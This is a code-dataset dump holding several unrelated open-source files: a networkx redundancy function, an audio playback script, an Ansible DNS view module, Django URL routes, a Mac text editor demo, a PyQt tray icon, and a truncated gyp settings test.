repo_name stringlengths 5 100 | path stringlengths 4 294 | copies stringclasses 990
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
debsankha/networkx | networkx/algorithms/bipartite/redundancy.py | 45 | 3946 | # -*- coding: utf-8 -*-
"""Node redundancy for bipartite graphs."""
# Copyright (C) 2011 by
# Jordi Torrents <jtorrents@milnou.net>
# Aric Hagberg <hagberg@lanl.gov>
# All rights reserved.
# BSD license.
from __future__ import division
from itertools import combinations
from networkx import NetworkXError
__author__ = """\n""".join(['Jordi Torrents <jtorrents@milnou.net>',
'Aric Hagberg (hagberg@lanl.gov)'])
__all__ = ['node_redundancy']
def node_redundancy(G, nodes=None):
    r"""Computes the node redundancy coefficients for the nodes in the
    bipartite graph ``G``.

    The redundancy coefficient of a node `v` is the fraction of pairs of
    neighbors of `v` that are both linked to other nodes. In a one-mode
    projection these nodes would be linked together even if `v` were
    not there.

    More formally, for any vertex `v`, the *redundancy coefficient of `v`* is
    defined by

    .. math::

        rc(v) = \frac{|\{\{u, w\} \subseteq N(v),
        \: \exists v' \neq v,\: (v',u) \in E\:
        \mathrm{and}\: (v',w) \in E\}|}{ \frac{|N(v)|(|N(v)|-1)}{2}},

    where `N(v)` is the set of neighbors of `v` in ``G``.

    Parameters
    ----------
    G : graph
        A bipartite graph

    nodes : list or iterable (optional)
        Compute redundancy for these nodes. The default is all nodes in G.

    Returns
    -------
    redundancy : dictionary
        A dictionary keyed by node with the node redundancy value.

    Examples
    --------
    Compute the redundancy coefficient of each node in a graph::

        >>> import networkx as nx
        >>> from networkx.algorithms import bipartite
        >>> G = nx.cycle_graph(4)
        >>> rc = bipartite.node_redundancy(G)
        >>> rc[0]
        1.0

    Compute the average redundancy for the graph::

        >>> sum(rc.values()) / len(G)
        1.0

    Compute the average redundancy for a set of nodes::

        >>> nodes = [0, 2]
        >>> sum(rc[n] for n in nodes) / len(nodes)
        1.0

    Raises
    ------
    NetworkXError
        If any of the nodes in the graph (or in ``nodes``, if specified) has
        (out-)degree less than two (which would result in division by zero,
        according to the definition of the redundancy coefficient).

    References
    ----------
    .. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).
       Basic notions for the analysis of large two-mode networks.
       Social Networks 30(1), 31--48.
    """
    if nodes is None:
        nodes = G
    # Materialize ``nodes``: it is iterated twice below (once by the degree
    # validation, once by the dict comprehension). A one-shot iterator or
    # generator argument would be exhausted by the first pass and the result
    # would silently be empty.
    nodes = list(nodes)
    if any(len(G[v]) < 2 for v in nodes):
        raise NetworkXError('Cannot compute redundancy coefficient for a node'
                            ' that has fewer than two neighbors.')
    # TODO This can be trivially parallelized.
    return {v: _node_redundancy(G, v) for v in nodes}
def _node_redundancy(G, v):
"""Returns the redundancy of the node ``v`` in the bipartite graph ``G``.
If ``G`` is a graph with ``n`` nodes, the redundancy of a node is the ratio
of the "overlap" of ``v`` to the maximum possible overlap of ``v``
according to its degree. The overlap of ``v`` is the number of pairs of
neighbors that have mutual neighbors themselves, other than ``v``.
``v`` must have at least two neighbors in ``G``.
"""
n = len(G[v])
# TODO On Python 3, we could just use `G[u].keys() & G[w].keys()` instead
# of instantiating the entire sets.
overlap = sum(1 for (u, w) in combinations(G[v], 2)
if (set(G[u]) & set(G[w])) - {v})
return (2 * overlap) / (n * (n - 1))
| bsd-3-clause |
andrasfuchs/BioBalanceDetector | Measurements/WaveForms/Experiments/SleepLogging/python/AnalogOut_Play.py | 1 | 3587 | """
DWF Python Example
Author: Digilent, Inc.
Revision: 2018-07-19
Requires:
Python 2.7, 3
"""
import numpy as np
import scipy.io.wavfile
import matplotlib.pyplot as plt
import ctypes
from ctypes import *
import sys
# Load the WAV file and report its basic properties.
print("Load audio.WAV file")
rate, data = scipy.io.wavfile.read('audio.wav')
print("Rate: "+str(rate))
print("Size: "+str(data.size))
print("Type: " +str(np.dtype(data[0])))

# AnalogOut expects double normalized to +/-1 value
# Scale the integer samples to floats in [-1, 1] according to the sample
# width reported by scipy (8-bit WAV data is unsigned, hence the offset).
dataf = data.astype(np.float64)
if np.dtype(data[0]) == np.int8 or np.dtype(data[0]) == np.uint8 :
    print("Scaling: UINT8")
    dataf /= 128.0
    dataf -= 1.0
elif np.dtype(data[0]) == np.int16 :
    print("Scaling: INT16")
    dataf /= 32768.0
elif np.dtype(data[0]) == np.int32 :
    print("Scaling: INT32")
    dataf /= 2147483648.0

# Copy the normalized samples into a C double array for the DWF API.
data_c = (ctypes.c_double * len(dataf))(*dataf)

# Show the waveform before starting playback (blocks until closed).
plt.plot(data)
plt.show()
# Load the platform-specific WaveForms (DWF) shared library.
if sys.platform.startswith("win"):
    dwf = cdll.dwf
elif sys.platform.startswith("darwin"):
    dwf = cdll.LoadLibrary("/Library/Frameworks/dwf.framework/dwf")
else:
    dwf = cdll.LoadLibrary("libdwf.so")

# declare ctype variables
hdwf = c_int()          # device handle filled in by FDwfDeviceOpen
channel = c_int(0)      # AWG 1

# print DWF version
version = create_string_buffer(16)
dwf.FDwfGetVersion(version)
print("DWF Version: "+str(version.value))

# open device (-1 selects the first available device)
print("Opening first device...")
dwf.FDwfDeviceOpen(c_int(-1), byref(hdwf))

if hdwf.value == 0:
    # hdwfNone: report the SDK's last error message and bail out.
    print("Failed to open device")
    szerr = create_string_buffer(512)
    dwf.FDwfGetLastErrorMsg(szerr)
    print(str(szerr.value))
    quit()
print("Playing audio...")
iPlay = 0  # number of samples handed to the device so far

# Configure AWG 1 for one-shot "play" streaming of the audio samples.
dwf.FDwfAnalogOutNodeEnableSet(hdwf, channel, 0, c_bool(True))
dwf.FDwfAnalogOutNodeFunctionSet(hdwf, channel, 0, c_int(31)) #funcPlay
dwf.FDwfAnalogOutRepeatSet(hdwf, channel, c_int(1))
# Total run time in seconds = sample count / sample rate.
sRun = 1.0*data.size/rate
print("Length: "+str(sRun))
dwf.FDwfAnalogOutRunSet(hdwf, channel, c_double(sRun))
dwf.FDwfAnalogOutNodeFrequencySet(hdwf, channel, 0, c_double(rate))
dwf.FDwfAnalogOutNodeAmplitudeSet(hdwf, channel, 0, c_double(1.0))

# prime the buffer with the first chunk of data
cBuffer = c_int(0)
dwf.FDwfAnalogOutNodeDataInfo(hdwf, channel, 0, 0, byref(cBuffer))
if cBuffer.value > data.size : cBuffer.value = data.size
dwf.FDwfAnalogOutNodeDataSet(hdwf, channel, 0, data_c, cBuffer)
iPlay += cBuffer.value
# Start the output.
dwf.FDwfAnalogOutConfigure(hdwf, channel, c_bool(True))

# Streaming-status out-parameters and running totals for the play loop.
dataLost = c_int(0)
dataFree = c_int(0)
dataCorrupted = c_int(0)
sts = c_ubyte(0)
totalLost = 0
totalCorrupted = 0
# Streaming loop: keep topping up the device buffer until playback stops.
while True :
    # fetch analog in info for the channel
    if dwf.FDwfAnalogOutStatus(hdwf, channel, byref(sts)) != 1:
        print("Error")
        szerr = create_string_buffer(512)
        dwf.FDwfGetLastErrorMsg(szerr)
        print(szerr.value)
        break

    if sts.value != 3: break # not running !DwfStateRunning
    if iPlay >= data.size : continue # no more data to stream

    # Query how much buffer space is free and whether samples were lost
    # or corrupted since the last call.
    dwf.FDwfAnalogOutNodePlayStatus(hdwf, channel, 0, byref(dataFree), byref(dataLost), byref(dataCorrupted))

    totalLost += dataLost.value
    totalCorrupted += dataCorrupted.value

    if iPlay + dataFree.value > data.size : # last chunk might be less than the free buffer size
        dataFree.value = data.size - iPlay
    if dataFree.value == 0 : continue

    if dwf.FDwfAnalogOutNodePlayData(hdwf, channel, 0, byref(data_c, iPlay*8), dataFree) != 1: # offset for double is *8 (bytes)
        print("Error")
        break

    iPlay += dataFree.value

# Report streaming statistics and stop the output.
print("Lost: "+str(totalLost))
print("Corrupted: "+str(totalCorrupted))
print("done")
dwf.FDwfAnalogOutReset(hdwf, channel)
dwf.FDwfDeviceClose(hdwf) | gpl-3.0 |
trishnaguha/ansible | lib/ansible/modules/net_tools/nios/nios_dns_view.py | 68 | 4192 | #!/usr/bin/python
# Copyright (c) 2018 Red Hat, Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = '''
---
module: nios_dns_view
version_added: "2.5"
author: "Peter Sprygada (@privateip)"
short_description: Configure Infoblox NIOS DNS views
description:
- Adds and/or removes instances of DNS view objects from
Infoblox NIOS servers. This module manages NIOS C(view) objects
using the Infoblox WAPI interface over REST.
- Updates instances of DNS view object from Infoblox NIOS servers.
requirements:
- infoblox-client
extends_documentation_fragment: nios
options:
name:
description:
- Specifies the fully qualified hostname to add or remove from
the system. User can also update the hostname as it is possible
to pass a dict containing I(new_name), I(old_name). See examples.
required: true
aliases:
- view
network_view:
description:
- Specifies the name of the network view to assign the configured
DNS view to. The network view must already be configured on the
target system.
required: true
default: default
extattrs:
description:
- Allows for the configuration of Extensible Attributes on the
instance of the object. This argument accepts a set of key / value
pairs for configuration.
required: false
comment:
description:
- Configures a text string comment to be associated with the instance
of this object. The provided text string will be configured on the
object instance.
required: false
state:
description:
- Configures the intended state of the instance of the object on
the NIOS server. When this value is set to C(present), the object
is configured on the device and when this value is set to C(absent)
the value is removed (if necessary) from the device.
required: false
default: present
choices:
- present
- absent
'''
EXAMPLES = '''
- name: configure a new dns view instance
nios_dns_view:
name: ansible-dns
state: present
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
- name: update the comment for dns view
nios_dns_view:
name: ansible-dns
comment: this is an example comment
state: present
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
- name: remove the dns view instance
nios_dns_view:
name: ansible-dns
state: absent
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
- name: update the dns view instance
nios_dns_view:
name: {new_name: ansible-dns-new, old_name: ansible-dns}
state: present
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
'''
RETURN = ''' # '''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.net_tools.nios.api import WapiModule
from ansible.module_utils.net_tools.nios.api import NIOS_DNS_VIEW
def main():
    """Main entry point for module execution."""
    # WAPI field spec for the NIOS DNS ``view`` object; ``ib_req`` marks the
    # fields WapiModule uses to identify the remote object instance.
    ib_spec = dict(
        name=dict(required=True, aliases=['view'], ib_req=True),
        network_view=dict(default='default', ib_req=True),
        extattrs=dict(type='dict'),
        comment=dict()
    )

    # The Ansible argument spec is the object spec plus the standard
    # provider/state options shared by all NIOS modules.
    module_args = dict(
        provider=dict(required=True),
        state=dict(default='present', choices=['present', 'absent'])
    )
    module_args.update(ib_spec)
    module_args.update(WapiModule.provider_spec)

    module = AnsibleModule(argument_spec=module_args,
                           supports_check_mode=True)

    # Let the WAPI wrapper reconcile desired vs. actual state and report.
    wapi = WapiModule(module)
    result = wapi.run(NIOS_DNS_VIEW, ib_spec)

    module.exit_json(**result)


if __name__ == '__main__':
    main()
| gpl-3.0 |
dokterbob/satchmo | satchmo/apps/satchmo_ext/newsletter/urls.py | 3 | 1161 | """
URLConf for Satchmo Newsletter app
This will get automatically added by satchmo_store, under the url given in your livesettings "NEWSLETTER","NEWSLETTER_SLUG"
"""
from django.conf.urls.defaults import *
from livesettings import config_value
import logging
log = logging.getLogger('newsletter.urls')
# Newsletter URL routes (old-style Django patterns(), view names are strings
# resolved against the satchmo_ext.newsletter.views prefix). Each route has
# an "ajah" variant that renders a minimal template for async requests.
urlpatterns = patterns('satchmo_ext.newsletter.views',
    (r'^subscribe/$', 'add_subscription', {}, 'newsletter_subscribe'),
    (r'^subscribe/ajah/$', 'add_subscription',
        {'result_template' : 'newsletter/ajah.html'}, 'newsletter_subscribe_ajah'),
    (r'^unsubscribe/$', 'remove_subscription',
        {}, 'newsletter_unsubscribe'),
    (r'^unsubscribe/ajah/$', 'remove_subscription',
        {'result_template' : 'newsletter/ajah.html'}, 'newsletter_unsubscribe_ajah'),
    (r'^update/$', 'update_subscription', {}, 'newsletter_update'),
)
# Mount point for the newsletter URLs, taken from the livesettings value
# "NEWSLETTER"/"NEWSLETTER_SLUG" (evaluated once at import time).
newsbase = r'^' + config_value('NEWSLETTER','NEWSLETTER_SLUG') + '/'
newspatterns = patterns('',
    (newsbase, include('satchmo_ext.newsletter.urls'))
)
def add_newsletter_urls(sender, patterns=(), **kwargs):
    # Signal handler that grafts the newsletter URLs onto the store's
    # URL patterns.
    # NOTE(review): ``patterns += newspatterns`` only has an effect for the
    # caller when ``patterns`` is passed as a mutable list (in-place extend);
    # with the tuple default the rebinding is local — presumably the
    # satchmo_store signal always passes a list. Verify against the caller.
    log.debug("Adding newsletter urls at %s", newsbase)
    patterns += newspatterns
| bsd-3-clause |
fighterCui/L4ReFiascoOC | l4/pkg/python/contrib/Mac/Demo/mlte/mlted.py | 39 | 11096 | # A minimal text editor using MLTE. Based on wed.py.
#
# To be done:
# - Functionality: find, etc.
from Menu import DrawMenuBar
from FrameWork import *
from Carbon import Win
from Carbon import Ctl
from Carbon import Qd
from Carbon import Res
from Carbon import Scrap
import os
from Carbon import MacTextEditor
from Carbon import Mlte
# Human-readable menu labels for Undo/Redo, indexed by the "which" code
# returned by TXNCanUndo()/TXNCanRedo().
UNDOLABELS = [ # Indexed by MLTECanUndo() value
    "Typing", "Cut", "Paste", "Clear", "Font Change", "Color Change", "Size Change",
    "Style Change", "Align Left", "Align Center", "Align Right", "Drop", "Move"]
class MlteWindow(Window):
    """One editor window wrapping an MLTE (Multilingual Text Engine) object.

    Each instance owns a Carbon window (``self.wid``) and a TXN text object
    (``self.ted``/``self.frameid``) and forwards FrameWork events to it.
    """

    def open(self, path, name, data):
        # Create the window titled *name* showing *data*; *path* is None for
        # a not-yet-saved document.
        self.path = path
        self.name = name
        r = windowbounds(400, 400)
        w = Win.NewWindow(r, name, 1, 0, -1, 1, 0)
        self.wid = w
        flags = MacTextEditor.kTXNDrawGrowIconMask|MacTextEditor.kTXNWantHScrollBarMask| \
                MacTextEditor.kTXNWantVScrollBarMask
        self.ted, self.frameid = Mlte.TXNNewObject(None, w, None, flags, MacTextEditor.kTXNTextEditStyleFrameType,
                MacTextEditor.kTXNTextFile, MacTextEditor.kTXNMacOSEncoding)
        self.ted.TXNSetData(MacTextEditor.kTXNTextData, data, 0, 0x7fffffff)
        self.changed = 0
        self.do_postopen()
        self.do_activate(1, None)

    def do_idle(self, event):
        # Give MLTE idle time (caret blink) and let it set the cursor shape.
        self.ted.TXNIdle()
        self.ted.TXNAdjustCursor(None)

    def do_activate(self, onoff, evt):
        # Track which window holds the keyboard focus; the application keeps
        # ``active`` pointing at the focused MlteWindow (or None).
        if onoff:
##            self.ted.TXNActivate(self.frameid, 0)
            self.ted.TXNFocus(1)
            self.parent.active = self
        else:
            self.ted.TXNFocus(0)
            self.parent.active = None
        self.parent.updatemenubar()

    def do_update(self, wid, event):
        # Redraw is fully delegated to MLTE.
        self.ted.TXNDraw(None)

    def do_postresize(self, width, height, window):
        self.ted.TXNResizeFrame(width, height, self.frameid)

    def do_contentclick(self, local, modifiers, evt):
        # A click may change the selection, so menu state must be refreshed.
        self.ted.TXNClick(evt)
        self.parent.updatemenubar()

    def do_char(self, ch, event):
        self.ted.TXNKeyDown(event)
        self.parent.updatemenubar()

    def close(self):
        # Offer to save a dirty document; AskYesNoCancel returns >0 for yes,
        # 0 for no and <0 for cancel (cancel aborts the close).
        # NOTE(review): EasyDialogs is not imported explicitly in this file;
        # presumably it is re-exported by ``from FrameWork import *`` — verify.
        if self.changed:
            save = EasyDialogs.AskYesNoCancel('Save window "%s" before closing?'%self.name, 1)
            if save > 0:
                self.menu_save()
            elif save < 0:
                return
        if self.parent.active == self:
            self.parent.active = None
        self.ted.TXNDeleteObject()
        del self.ted
##        del self.tedtexthandle
        self.do_postclose()

    def menu_save(self):
        if not self.path:
            self.menu_save_as()
            return # Will call us recursively
        dhandle = self.ted.TXNGetData(0, 0x7fffffff)
        data = dhandle.data
        fp = open(self.path, 'wb') # NOTE: wb, because data has CR for end-of-line
        fp.write(data)
        # Ensure the file ends with a carriage return (classic Mac EOL).
        if data[-1] <> '\r': fp.write('\r')
        fp.close()
        self.changed = 0

    def menu_save_as(self):
        path = EasyDialogs.AskFileForSave(message='Save as:')
        if not path: return
        self.path = path
        self.name = os.path.split(self.path)[-1]
        self.wid.SetWTitle(self.name)
        self.menu_save()

    def menu_cut(self):
##        self.ted.WESelView()
        self.ted.TXNCut()
        ### Mlte.ConvertToPublicScrap()
##        Scrap.ZeroScrap()
##        self.ted.WECut()
##        self.updatescrollbars()
        self.parent.updatemenubar()
        self.changed = 1

    def menu_copy(self):
##        Scrap.ZeroScrap()
        self.ted.TXNCopy()
        ### Mlte.ConvertToPublicScrap()
##        self.updatescrollbars()
        self.parent.updatemenubar()

    def menu_paste(self):
        ### Mlte.ConvertFromPublicScrap()
        self.ted.TXNPaste()
##        self.updatescrollbars()
        self.parent.updatemenubar()
        self.changed = 1

    def menu_clear(self):
##        self.ted.WESelView()
        self.ted.TXNClear()
##        self.updatescrollbars()
        self.parent.updatemenubar()
        self.changed = 1

    def menu_undo(self):
        self.ted.TXNUndo()
##        self.updatescrollbars()
        self.parent.updatemenubar()

    def menu_redo(self):
        self.ted.TXNRedo()
##        self.updatescrollbars()
        self.parent.updatemenubar()

    def have_selection(self):
        # True when the TXN selection is non-empty.
        start, stop = self.ted.TXNGetSelection()
        return start < stop

    def can_paste(self):
        return Mlte.TXNIsScrapPastable()

    def can_undo(self):
        # Return a menu label ("Undo <action>") or None when nothing to undo.
        can, which = self.ted.TXNCanUndo()
        if not can:
            return None
        if which >= len(UNDOLABELS):
            # Unspecified undo
            return "Undo"
        which = UNDOLABELS[which]
        return "Undo "+which

    def can_redo(self):
        # Same contract as can_undo(), for the redo direction.
        can, which = self.ted.TXNCanRedo()
        if not can:
            return None
        if which >= len(UNDOLABELS):
            # Unspecified undo
            return "Redo"
        which = UNDOLABELS[which]
        return "Redo "+which
class Mlted(Application):
    """The editor application: owns the menus and dispatches menu commands
    to the currently focused MlteWindow (``self.active``)."""

    def __init__(self):
        Application.__init__(self)
        self.num = 0            # counter used to title "Untitled %d" windows
        self.active = None      # the MlteWindow with keyboard focus, if any
        self.updatemenubar()

    def makeusermenus(self):
        # Build the File and Edit menus and remember the items whose enabled
        # state has to track the focused window.
        self.filemenu = m = Menu(self.menubar, "File")
        self.newitem = MenuItem(m, "New window", "N", self.open)
        self.openitem = MenuItem(m, "Open...", "O", self.openfile)
        self.closeitem = MenuItem(m, "Close", "W", self.closewin)
        m.addseparator()
        self.saveitem = MenuItem(m, "Save", "S", self.save)
        self.saveasitem = MenuItem(m, "Save as...", "", self.saveas)
        m.addseparator()
        self.quititem = MenuItem(m, "Quit", "Q", self.quit)

        self.editmenu = m = Menu(self.menubar, "Edit")
        self.undoitem = MenuItem(m, "Undo", "Z", self.undo)
        self.redoitem = MenuItem(m, "Redo", None, self.redo)
        m.addseparator()
        self.cutitem = MenuItem(m, "Cut", "X", self.cut)
        self.copyitem = MenuItem(m, "Copy", "C", self.copy)
        self.pasteitem = MenuItem(m, "Paste", "V", self.paste)
        self.clearitem = MenuItem(m, "Clear", "", self.clear)

        # Groups of items enabled together:
        self.windowgroup = [self.closeitem, self.saveitem, self.saveasitem, self.editmenu]
        self.focusgroup = [self.cutitem, self.copyitem, self.clearitem]
        # Cached enable/label state; -1 / "never" force a refresh on the
        # first updatemenubar() call.
        self.windowgroup_on = -1
        self.focusgroup_on = -1
        self.pastegroup_on = -1
        self.undo_label = "never"
        self.redo_label = "never"

    def updatemenubar(self):
        # Re-enable/re-label menu items to match the focused window, redrawing
        # the menu bar only when something actually changed.
        changed = 0
        on = (self.active <> None)
        if on <> self.windowgroup_on:
            for m in self.windowgroup:
                m.enable(on)
            self.windowgroup_on = on
            changed = 1
        if on:
            # only if we have an edit menu
            on = self.active.have_selection()
            if on <> self.focusgroup_on:
                for m in self.focusgroup:
                    m.enable(on)
                self.focusgroup_on = on
                changed = 1
            on = self.active.can_paste()
            if on <> self.pastegroup_on:
                self.pasteitem.enable(on)
                self.pastegroup_on = on
                changed = 1
            # can_undo()/can_redo() return a label string or None, so the
            # cached value doubles as the enabled flag and the item text.
            on = self.active.can_undo()
            if on <> self.undo_label:
                if on:
                    self.undoitem.enable(1)
                    self.undoitem.settext(on)
                    self.undo_label = on
                else:
                    self.undoitem.settext("Nothing to undo")
                    self.undoitem.enable(0)
                changed = 1
            on = self.active.can_redo()
            if on <> self.redo_label:
                if on:
                    self.redoitem.enable(1)
                    self.redoitem.settext(on)
                    self.redo_label = on
                else:
                    self.redoitem.settext("Nothing to redo")
                    self.redoitem.enable(0)
                changed = 1
        if changed:
            DrawMenuBar()

    #
    # Apple menu
    #

    def do_about(self, id, item, window, event):
        EasyDialogs.Message("A simple single-font text editor based on MacTextEditor")

    #
    # File menu
    #

    def open(self, *args):
        # "New window": open without asking for a file.
        self._open(0)

    def openfile(self, *args):
        # "Open...": ask the user for a TEXT file first.
        self._open(1)

    def _open(self, askfile):
        # Shared implementation for New/Open; *askfile* selects the mode.
        if askfile:
            path = EasyDialogs.AskFileForOpen(typeList=('TEXT',))
            if not path:
                return
            name = os.path.split(path)[-1]
            try:
                fp = open(path, 'rb') # NOTE binary, we need cr as end-of-line
                data = fp.read()
                fp.close()
            except IOError, arg:
                EasyDialogs.Message("IOERROR: %r" % (arg,))
                return
        else:
            path = None
            name = "Untitled %d"%self.num
            data = ''
        w = MlteWindow(self)
        w.open(path, name, data)
        self.num = self.num + 1

    def closewin(self, *args):
        if self.active:
            self.active.close()
        else:
            EasyDialogs.Message("No active window?")

    def save(self, *args):
        if self.active:
            self.active.menu_save()
        else:
            EasyDialogs.Message("No active window?")

    def saveas(self, *args):
        if self.active:
            self.active.menu_save_as()
        else:
            EasyDialogs.Message("No active window?")

    def quit(self, *args):
        # Close every window first; any close() vetoed by the user (cancel in
        # the save dialog) leaves _windows non-empty and aborts the quit.
        for w in self._windows.values():
            w.close()
        if self._windows:
            return
        self._quit()

    #
    # Edit menu
    #

    def undo(self, *args):
        if self.active:
            self.active.menu_undo()
        else:
            EasyDialogs.Message("No active window?")

    def redo(self, *args):
        if self.active:
            self.active.menu_redo()
        else:
            EasyDialogs.Message("No active window?")

    def cut(self, *args):
        if self.active:
            self.active.menu_cut()
        else:
            EasyDialogs.Message("No active window?")

    def copy(self, *args):
        if self.active:
            self.active.menu_copy()
        else:
            EasyDialogs.Message("No active window?")

    def paste(self, *args):
        if self.active:
            self.active.menu_paste()
        else:
            EasyDialogs.Message("No active window?")

    def clear(self, *args):
        if self.active:
            self.active.menu_clear()
        else:
            EasyDialogs.Message("No active window?")

    #
    # Other stuff
    #

    def idle(self, event):
        # Forward idle time to the focused window, or show the arrow cursor.
        if self.active:
            self.active.do_idle(event)
        else:
            Qd.SetCursor(Qd.GetQDGlobalsArrow())
def main():
    """Initialize the MLTE Textension library, run the editor, and make
    sure the library is torn down even if the event loop raises."""
    Mlte.TXNInitTextension(0)
    try:
        app = Mlted()
        app.mainloop()
    finally:
        Mlte.TXNTerminateTextension()


if __name__ == '__main__':
    main()
| gpl-2.0 |
ialex/opentumblr-qt | opentumblrqt/gui/TumblrTray.py | 1 | 3961 | from PyQt4 import QtCore,QtGui
try:
from opentumblrqt.dashboard import Dashboard
from opentumblrqt.text import Text
from opentumblrqt.photo import Photo
from opentumblrqt.quote import Quote
from opentumblrqt.link import Link
from opentumblrqt.chat import Chat
from opentumblrqt.audio import Audio
from opentumblrqt.video import Video
except ImportError:
from ..opentumblrqt.dashboard import Dashboard
from text import Text
from photo import Photo
from quote import Quote
from link import Link
from chat import Chat
from audio import Audio
from video import Video
class TumblrTray(QtGui.QSystemTrayIcon):
    """System-tray icon for OpenTumblr: double-click toggles the dashboard,
    right-click opens a context menu with one action per post type."""

    def __init__(self,parent=None):
        super(TumblrTray, self).__init__(parent)
        self.setupUi(parent)
        #Dashboard instance
        self.dashboard = Dashboard(parent)
        self.p = parent
        # Connect tray activation and every menu action to its handler
        # (old-style PyQt4 SIGNAL/SLOT strings).
        self.connect(self.tray,QtCore.SIGNAL('activated(QSystemTrayIcon::ActivationReason)'),self.OnClick)
        self.connect(self.Text,QtCore.SIGNAL('triggered()'),self.OnText)
        self.connect(self.Photo, QtCore.SIGNAL('triggered()'), self.OnPhoto)
        self.connect(self.Quote, QtCore.SIGNAL('triggered()'), self.OnQuote)
        self.connect(self.Url, QtCore.SIGNAL('triggered()'), self.OnUrl)
        self.connect(self.Chat, QtCore.SIGNAL('triggered()'), self.OnChat)
        self.connect(self.Audio, QtCore.SIGNAL('triggered()'), self.OnAudio)
        self.connect(self.Video, QtCore.SIGNAL('triggered()'), self.OnVideo)
        self.connect(self.Exit, QtCore.SIGNAL('triggered()'), self.OnLogout)

    def setupUi(self,parent):
        # Build the tray icon and its context menu with one QAction per
        # Tumblr post type plus Exit.
        icon = QtGui.QIcon()
        icon.addPixmap(QtGui.QPixmap("/usr/share/pixmaps/opentumblr-qt/dashboard/opentumblr_icon.jpg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        self.tray = QtGui.QSystemTrayIcon(parent)
        self.tray.setIcon(icon)
        self.tray.show()
        #Creating the context menu
        self.Traymenu = QtGui.QMenu(parent)
        self.Text = QtGui.QAction("&Text",parent)
        self.Photo = QtGui.QAction("&Photo",parent)
        self.Quote = QtGui.QAction("&Quote",parent)
        self.Url = QtGui.QAction("&Url",parent)
        self.Chat = QtGui.QAction("&Chat",parent)
        self.Audio = QtGui.QAction("&Audio",parent)
        self.Video = QtGui.QAction("&Video",parent)
        self.Exit = QtGui.QAction("&Exit",parent)
        self.Traymenu.addAction(self.Text)
        self.Traymenu.addAction(self.Photo)
        self.Traymenu.addAction(self.Quote)
        self.Traymenu.addAction(self.Url)
        self.Traymenu.addAction(self.Chat)
        self.Traymenu.addAction(self.Audio)
        self.Traymenu.addAction(self.Video)
        self.Traymenu.addAction(self.Exit)
        self.setContextMenu(self.Traymenu)

    def OnClick(self,reason):
        # Double-click toggles the dashboard window visibility.
        if reason == QtGui.QSystemTrayIcon.DoubleClick:
            if self.dashboard.isVisible():
                self.dashboard.hide()
            else:
                self.dashboard.show()
        # Right-click (context) shows the posting menu at the cursor.
        if reason == QtGui.QSystemTrayIcon.Context:
            self.contextMenu().popup(QtGui.QCursor.pos())

    def OnText(self):
        # Each OnXxx handler opens the corresponding post-composer dialog.
        text = Text(self.parent())
        text.show()

    def OnPhoto(self):
        photo = Photo(self.parent())
        photo.show()

    def OnQuote(self):
        quote = Quote(self.parent())
        quote.show()

    def OnUrl(self):
        link = Link(self.parent())
        link.show()

    def OnChat(self):
        chat = Chat(self.parent())
        chat.show()

    def OnAudio(self):
        # Audio takes the API object directly rather than the parent widget.
        audio = Audio(None,self.parent().api)
        audio.show()

    def OnVideo(self):
        video = Video(self.parent())
        video.show()

    def OnLogout(self):
        # Closing the parent window ends the application.
        self.parent().close()
| mit |
standback/standback.github.io | node_modules/gulp-sass/node_modules/node-sass/node_modules/node-gyp/gyp/pylib/gyp/MSVSSettings_test.py | 1446 | 65937 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unit tests for the MSVSSettings.py file."""
import StringIO
import unittest
import gyp.MSVSSettings as MSVSSettings
class TestSequenceFunctions(unittest.TestCase):
def setUp(self):
self.stderr = StringIO.StringIO()
def _ExpectedWarnings(self, expected):
"""Compares recorded lines to expected warnings."""
self.stderr.seek(0)
actual = self.stderr.read().split('\n')
actual = [line for line in actual if line]
self.assertEqual(sorted(expected), sorted(actual))
def testValidateMSVSSettings_tool_names(self):
"""Tests that only MSVS tool names are allowed."""
MSVSSettings.ValidateMSVSSettings(
{'VCCLCompilerTool': {},
'VCLinkerTool': {},
'VCMIDLTool': {},
'foo': {},
'VCResourceCompilerTool': {},
'VCLibrarianTool': {},
'VCManifestTool': {},
'ClCompile': {}},
self.stderr)
self._ExpectedWarnings([
'Warning: unrecognized tool foo',
'Warning: unrecognized tool ClCompile'])
def testValidateMSVSSettings_settings(self):
"""Tests that for invalid MSVS settings."""
MSVSSettings.ValidateMSVSSettings(
{'VCCLCompilerTool': {
'AdditionalIncludeDirectories': 'folder1;folder2',
'AdditionalOptions': ['string1', 'string2'],
'AdditionalUsingDirectories': 'folder1;folder2',
'AssemblerListingLocation': 'a_file_name',
'AssemblerOutput': '0',
'BasicRuntimeChecks': '5',
'BrowseInformation': 'fdkslj',
'BrowseInformationFile': 'a_file_name',
'BufferSecurityCheck': 'true',
'CallingConvention': '-1',
'CompileAs': '1',
'DebugInformationFormat': '2',
'DefaultCharIsUnsigned': 'true',
'Detect64BitPortabilityProblems': 'true',
'DisableLanguageExtensions': 'true',
'DisableSpecificWarnings': 'string1;string2',
'EnableEnhancedInstructionSet': '1',
'EnableFiberSafeOptimizations': 'true',
'EnableFunctionLevelLinking': 'true',
'EnableIntrinsicFunctions': 'true',
'EnablePREfast': 'true',
'Enableprefast': 'bogus',
'ErrorReporting': '1',
'ExceptionHandling': '1',
'ExpandAttributedSource': 'true',
'FavorSizeOrSpeed': '1',
'FloatingPointExceptions': 'true',
'FloatingPointModel': '1',
'ForceConformanceInForLoopScope': 'true',
'ForcedIncludeFiles': 'file1;file2',
'ForcedUsingFiles': 'file1;file2',
'GeneratePreprocessedFile': '1',
'GenerateXMLDocumentationFiles': 'true',
'IgnoreStandardIncludePath': 'true',
'InlineFunctionExpansion': '1',
'KeepComments': 'true',
'MinimalRebuild': 'true',
